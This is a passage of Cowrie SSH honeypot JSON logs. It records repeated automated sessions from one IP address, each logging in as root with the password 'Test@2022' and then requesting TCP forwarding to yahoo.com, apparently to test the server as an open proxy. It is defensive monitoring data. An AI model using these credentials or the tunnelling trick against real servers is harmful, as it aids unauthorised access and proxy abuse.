{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.006225Z","src_ip":"213.209.150.239","session":"95034ad64721"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55088,"dst_ip":"1.2.3.4","dst_port":22,"session":"4535813bf20e","protocol":"ssh","message":"New connection: 213.209.150.239:55088 (1.2.3.4:22) [session: 4535813bf20e]","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.061692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.062830Z","src_ip":"213.209.150.239","session":"4535813bf20e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.119432Z","src_ip":"213.209.150.239","session":"4535813bf20e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.401303Z","src_ip":"213.209.150.239","session":"4535813bf20e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":20717,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20717","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.459400Z","session":"4535813bf20e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.515971Z","src_ip":"213.209.150.239","session":"4535813bf20e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20755,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20755","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.670973Z","session":"4535813bf20e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.727556Z","src_ip":"213.209.150.239","session":"4535813bf20e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.784928Z","src_ip":"213.209.150.239","session":"4535813bf20e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55128,"dst_ip":"1.2.3.4","dst_port":22,"session":"61093524905f","protocol":"ssh","message":"New connection: 213.209.150.239:55128 (1.2.3.4:22) [session: 61093524905f]","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.831119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.840520Z","src_ip":"213.209.150.239","session":"61093524905f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:12.878283Z","src_ip":"213.209.150.239","session":"61093524905f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.112697Z","src_ip":"213.209.150.239","session":"61093524905f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":2314,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:2314","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.160552Z","session":"61093524905f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.207633Z","src_ip":"213.209.150.239","session":"61093524905f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":16684,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16684","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.353377Z","session":"61093524905f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.400608Z","src_ip":"213.209.150.239","session":"61093524905f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.448469Z","src_ip":"213.209.150.239","session":"61093524905f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55169,"dst_ip":"1.2.3.4","dst_port":22,"session":"236932b792d3","protocol":"ssh","message":"New connection: 213.209.150.239:55169 (1.2.3.4:22) [session: 236932b792d3]","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.495022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.496130Z","src_ip":"213.209.150.239","session":"236932b792d3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.543389Z","src_ip":"213.209.150.239","session":"236932b792d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.778818Z","src_ip":"213.209.150.239","session":"236932b792d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":30410,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30410","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.827340Z","session":"236932b792d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:13.874505Z","src_ip":"213.209.150.239","session":"236932b792d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":13707,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:13707","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.009464Z","session":"236932b792d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.056666Z","src_ip":"213.209.150.239","session":"236932b792d3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.104763Z","src_ip":"213.209.150.239","session":"236932b792d3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55212,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2b6411a24e1","protocol":"ssh","message":"New connection: 213.209.150.239:55212 (1.2.3.4:22) [session: b2b6411a24e1]","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.151222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.152443Z","src_ip":"213.209.150.239","session":"b2b6411a24e1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.199668Z","src_ip":"213.209.150.239","session":"b2b6411a24e1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.435013Z","src_ip":"213.209.150.239","session":"b2b6411a24e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":18642,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:18642","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.483127Z","session":"b2b6411a24e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.530516Z","src_ip":"213.209.150.239","session":"b2b6411a24e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":27941,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27941","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.665575Z","session":"b2b6411a24e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.712948Z","src_ip":"213.209.150.239","session":"b2b6411a24e1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.761099Z","src_ip":"213.209.150.239","session":"b2b6411a24e1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55262,"dst_ip":"1.2.3.4","dst_port":22,"session":"4696a73b9cfc","protocol":"ssh","message":"New connection: 213.209.150.239:55262 (1.2.3.4:22) [session: 4696a73b9cfc]","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.807360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.808360Z","src_ip":"213.209.150.239","session":"4696a73b9cfc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:14.855761Z","src_ip":"213.209.150.239","session":"4696a73b9cfc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.091980Z","src_ip":"213.209.150.239","session":"4696a73b9cfc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":10726,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:10726","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.140162Z","session":"4696a73b9cfc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.187693Z","src_ip":"213.209.150.239","session":"4696a73b9cfc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":32237,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:32237","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.325573Z","session":"4696a73b9cfc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.373070Z","src_ip":"213.209.150.239","session":"4696a73b9cfc"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.421285Z","src_ip":"213.209.150.239","session":"4696a73b9cfc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55302,"dst_ip":"1.2.3.4","dst_port":22,"session":"35ec250c4ebb","protocol":"ssh","message":"New connection: 213.209.150.239:55302 (1.2.3.4:22) [session: 35ec250c4ebb]","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.476642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.477540Z","src_ip":"213.209.150.239","session":"35ec250c4ebb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha2